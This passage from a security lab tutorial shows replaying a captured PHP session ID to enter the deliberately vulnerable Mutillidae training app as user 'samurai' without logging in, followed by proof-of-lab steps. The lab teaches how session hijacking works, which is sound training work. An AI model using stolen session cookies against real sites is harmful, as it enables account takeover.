- Host: 192.168.1.111
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
- Click the Close Button
- Close Firefox
- Note(FYI):
- So, let's test our theory and see if we can still get into the website using the username (samurai) and PHP Session ID we captured.
- Instructions:
- File --> Quit
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqivKkvzFCyoYvPZYpLLRFeMMWI4Jz2Xzc5WIKv9fthjEnM7kS7Zz_H6aM4k0qaTK3MpYu_g4zB9iLYbEuAy5JrUTk3KQdRfgzfGq3t9U2Qy17v1uATKoSQqJkgxyGB55RKtAuzj9JFf0rOuX6iiERyNSxjcbZNTR8GbVOPL9kMMxcteFeMYLrNnw=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP Address obtained in Section 3, Step 3.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Notice samurai is logged in without us clicking Login/Register.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSH3NY5qP9o3ZoGWsyGpp-4_Mq2UOk0TwYVdve9EpVrkMAHVhedccwgGjJe6BdpqoRyXtA8L5pW84O6gsLVn69nMTN71p3IaHeXUnGROdlIcY8cB0G1RZwAi1kc76uavkLn68iJRkTdSG3XOLTk-FRblt6qLwyiTCTA19VOKu9RE2MUsFyEbeJyg4=s0-d)
- Proof of Lab (On a BackTrack Terminal)
- Instructions:
- cat /var/www/logdir/log.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZO1TDMZOpTrN6U43xqZGBmQlc4exptgA0j7husES20H9suvpL1SeEUo4bt37nN80mR3jJk3qIIZkNDfUjh4sRN3eC45UjcIjFQs-AiytJxe28PZGk36OEwvy9496zCAkrvwvktTT-ELL8OBvgUJEKy8C3o2BjPE2V81Id1dkv522tDr8s2BeBu1E=s0-d)